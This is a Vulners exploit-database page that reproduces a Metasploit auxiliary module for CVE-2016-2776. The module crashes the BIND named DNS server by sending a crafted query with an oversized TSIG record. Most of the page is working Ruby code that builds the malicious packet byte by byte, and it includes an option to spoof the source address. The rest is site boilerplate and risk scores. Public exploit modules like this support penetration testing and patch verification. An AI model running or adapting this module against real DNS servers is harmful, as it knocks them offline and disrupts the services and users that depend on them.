Vulners
Lucene search
BIND TSIG Query Denial of Service
🗓️ 31 Aug 2024 00:00:00Reported by Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research Team, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 329 Views
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::UDPScanner
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'BIND TSIG Query Denial of Service',
'Description' => %q{
A defect in the rendering of messages into packets can cause named to
exit with an assertion failure in buffer.c while constructing a response
to a query that meets certain criteria.
This assertion can be triggered even if the apparent source address
isn't allowed to make queries.
},
# Research and Original PoC - msf module author
'Author' => [
'Martin Rocha',
'Ezequiel Tavella',
'Alejandro Parodi',
'Infobyte Research Team'
],
'References' => [
['CVE', '2016-2776'],
['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']
],
'DisclosureDate' => '2016-09-27',
'License' => MSF_LICENSE,
'DefaultOptions' => {'ScannerRecvWindow' => 0}
))
register_options([
Opt::RPORT(53),
OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
])
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
end
def scan_host(ip)
if datastore['SRC_ADDR']
scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
else
print_status("Sending packet to #{ip}")
scanner_send(payload, ip, rport)
end
end
def payload
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
query << "\x00\x00" # Flags: 0x0000 Standard query
query << "\x00\x01" # Questions: 1
query << "\x00\x00" # Answer RRs: 0
query << "\x00\x00" # Authority RRs: 0
query << "\x00\x01" # Additional RRs: 1
# Domain Name
query << get_domain # Random DNS Name
query << "\x00" # [End of name]
query << "\x00\x01" # Type: A (Host Address) (1)
query << "\x00\x01" # Class: IN (0x0001)
# Additional records. Name
query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
query << "\x3d"+Rex::Text.rand_text_alphanumeric(61)
query << "\x00"
query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
query << "\x00\xff" # Class: ANY (0x00ff)
query << "\x00\x00\x00\x00" # Time to live: 0
query << "\x00\xfc" # Data length: 252
# Algorithm Name
query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
query << "\x00"
# Rest of TSIG
query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART
query << "\x01\x2c" # Fudge: 300
query << "\x00\x10" # MAC Size: 16
query << Rex::Text.rand_text_alphanumeric(16) # MAC
query << "\x8f\x65" # Original Id: 36709
query << "\x00\x00" # Error: No error (0)
query << "\x00\x00" # Other len: 0
end
def get_domain
domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
domain+org
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 37.5
CVSS 27.8
EPSS0.8745